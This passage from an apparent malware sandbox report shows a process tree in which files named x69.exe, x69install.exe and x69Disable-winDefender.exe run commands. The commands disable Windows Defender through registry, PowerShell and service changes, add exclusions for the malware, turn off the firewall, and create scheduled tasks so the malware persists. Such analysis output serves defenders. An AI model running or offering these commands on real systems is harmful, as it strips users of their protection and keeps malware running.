                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                5⤵
                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                PID:3772
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                5⤵
                                                                                                  PID:4904
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                  5⤵
                                                                                                    PID:4056
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:1896
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:3756
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:2844
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:4348
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:4540
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                      PID:2424
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                        PID:3016
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                        5⤵
                                                                                                          PID:404
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                          5⤵
                                                                                                            PID:4308
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                            5⤵
                                                                                                              PID:4160
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                              5⤵
                                                                                                                PID:4460
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                5⤵
                                                                                                                  PID:1680
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                  5⤵
                                                                                                                    PID:4320
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                    5⤵
                                                                                                                      PID:1432
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                      5⤵
                                                                                                                        PID:1852
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                        5⤵
                                                                                                                          PID:4720
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                          5⤵
                                                                                                                            PID:4556
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                            5⤵
                                                                                                                              PID:1676
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                              5⤵
                                                                                                                                PID:848
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                5⤵
                                                                                                                                  PID:3672
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:4692
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:4240
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:1580
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:3224
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:1712
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies security service
                                                                                                                                    PID:3596
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
                                                                                                                                3⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4172
                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
                                                                                                                                3⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:4840
                                                                                                                              • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\x69install.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1864
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2864
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:2976
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:2092
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:980
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3176
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2840
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1432
                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1888
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1520
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3432
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2456
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9933.tmp\9934.tmp\9935.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:3408
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3708
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2580
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4692
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1444
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3192
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3572
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3596
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2412
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:844
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:216
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3400
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4148
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4088
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4828
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1700
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3984
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                        6⤵
                                                                                                                                          PID:1896
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                        5⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3756
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                          6⤵
                                                                                                                                            PID:1840
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1560
                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:3752
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                          PID:3908
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                          PID:216
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:2804
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                                            5⤵
                                                                                                                                              PID:3672
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:3400
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:3772
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:408
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:788
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:4056
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                                PID:824
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                5⤵
                                                                                                                                                  PID:2844
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                  5⤵
                                                                                                                                                    PID:876
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4440
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                      5⤵
                                                                                                                                                        PID:3668
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4348
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3908
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4612
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                              5⤵
                                                                                                                                                                PID:404
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:3400
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4904
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3040
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3528
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:876
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:3984
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:2340
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:3920
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:4188
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:3904
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:4428
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies security service
                                                                                                                                                                              PID:1676
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:4016
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:3136
                                                                                                                                                                      • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                        "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:2764
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
